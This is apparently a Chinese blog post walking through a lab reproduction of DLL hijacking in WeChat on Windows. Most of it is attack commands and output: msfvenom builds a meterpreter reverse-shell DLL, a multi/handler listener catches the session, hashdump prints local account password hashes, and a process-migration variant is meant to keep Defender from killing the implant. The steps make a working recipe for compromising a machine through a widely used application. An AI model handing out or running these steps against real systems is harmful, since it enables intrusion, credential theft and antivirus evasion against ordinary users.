本地微信DLL劫持提权复现
一、分析微信DLL
1、火绒剑分析
分析在启动微信时,会启用什么DLL文件
然后使用木马和他替换,能够执行木马为止
2、生成木马
#启动msf
┌──(root?kali-3)-[/home/sword]
└─# msfdb run
[i] Database already started
#生成dll木马
msf6 > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.88.141 LPORT=4444 -f dll -o shell.dll
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.88.141 LPORT=4444 -f dll -o shell.dll
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
#查看木马
msf6 > ls
[*] exec: ls
shell.dll shell.exe
3、替换文件
访问到微信的DLL文件里使用
shell.dll修改名字为实验的dll文件名字
然后我们去kali监听一下
4、KALI监听
#进入监听模块
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
#查看参数
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
#写入监听地址
msf6 exploit(multi/handler) > set lhost 192.168.88.140
lhost => 192.168.88.140
#跟换payload
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
#运行模块
msf6 exploit(multi/handler) > run
5、启动微信观察监听
换了
dll文件之后微信直接打不开了我们得还原
dll文件然后重新替换下一个
重新启动微信,再次观察监听端口
#保存会话退出
meterpreter > bg
[*] Backgrounding session 2...
#查看会话
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/windows DESKTOP-74FDETH\Administrator @ DESKTOP-74 192.168.88.140:4444 -> 192.168.88.131:49919
FDETH (192.168.88.131)
发现有连接过来的shell
微信并没有正常运行,可以直接利用
二、实现DLL劫持提权
1、上传木马到目标主机
直接替换掉
2、切换为管理员用户打开微信
#进入会话
msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...
#查看当前用户
meterpreter > getuid
Server username: DESKTOP-74FDETH\Administrator
#当前进程
meterpreter > getpid
Current pid: 7472
#进入cmd命令行
meterpreter > shell
Process 3684 created.
Channel 1 created.
Microsoft Windows [°汾 10.0.17134.228]
(c) 2018 Microsoft Corporation??±?????{??
#查看权限
C:\Program Files\Tencent\WeChat>whoami
whoami
desktop-74fdeth\administrator
#退出cmd
C:\Program Files\Tencent\WeChat>exit
exit
#从SAM数据库中导出本地用户账户
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3984bd4d943547bcd12b850029d030e2:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1000:aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a844c57772d66f99bab4450eee6ccce:::
meterpreter >
这样就实现了DDL劫持提权
三、注入进程木马
可能一些复现情况是木马坚持不了多久会自动下线
可能是Windows的Defender的原因
所以我们需要更换进程木马
1、生成木马
#进程注入木马
msf6 > msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.140 lport=4444 prependmigrateprocess=explorer.exe prependmigrate=true -f dll > explorer.dll
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.140 lport=4444 prependmigrateprocess=explorer.exe prependmigrate=true -f dll > explorer.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 901 bytes
Final size of dll file: 8704 bytes
msf6 > ls
[*] exec: ls
公共 模板 视频 图片 文档 下载 音乐 桌面 explorer.dll shell
2、上传木马
#开启http服务
msf6 > python -m http.server 80
[*] exec: python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
访问kali的http服务
3、替换文件
杀死刚刚打开微信的进程
文件替换
4、观察KALI监听端口
切换为管理员用户运行微信,并且观察kali监听端口
再次上线,直接没什么大问题了
709
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
